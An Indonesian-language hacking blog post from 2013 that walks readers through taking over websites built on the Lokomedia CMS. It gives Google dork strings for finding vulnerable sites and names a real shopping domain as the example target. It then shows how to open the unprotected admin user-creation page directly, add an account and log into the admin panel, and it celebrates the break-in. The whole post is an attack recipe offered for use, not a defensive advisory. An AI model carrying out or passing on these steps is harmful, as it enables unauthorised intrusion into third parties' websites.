Posted by : Unknown
Minggu, 17 Maret 2013
Selamat Weekend Sobat 207CS , ketemu lagi dengan Ane Daffa-x207
kali ini ane mau posting BUG CMS LOKOMEDIA :D langsung disimak ya :P
Langkah Langkah :
1.) Masukan Dork Di www.google.com / www.bing.com
DORK :
inurl:"admin/foto_berita/"
inurl:"media.php?module="
allinurl:/media.php?module=berita
2.) pilih salah satu target ente, misalkan disini target ane adalah http://www.tiketdiskon.net/media.php?module=home
3.) lalu kita ubah URL dari Web tadi itu gan :D dengan mengubahnya / menambahkan setelah alamat web target tersebut denagn injeksi dibawah ini gan :D
Injeksi : /admin/content.php?module=user
#Sebelumnya : http://www.tiketdiskon.net/media.php?module=home
#Sesudah : http://www.tiketdiskon.net/admin/content.php?module=user
4.) Setelah itu klik tambah user, lalu isikan form terserah ente gan lalu klik simpan :P
5.) Setelah itu tinggal login deh di Admin Panelnya :D
http://www.tiketdiskon.net/admin/
6.) Horeee :P Ane udah login di web tersebut gan :D wkwkkw
Sekian dari Saya
Thanks To : Katonz | Surabaya Blackhat
Rating: 4.5
Reviewer: Unknown
ItemReviewed: Bug CMS Lokomedia News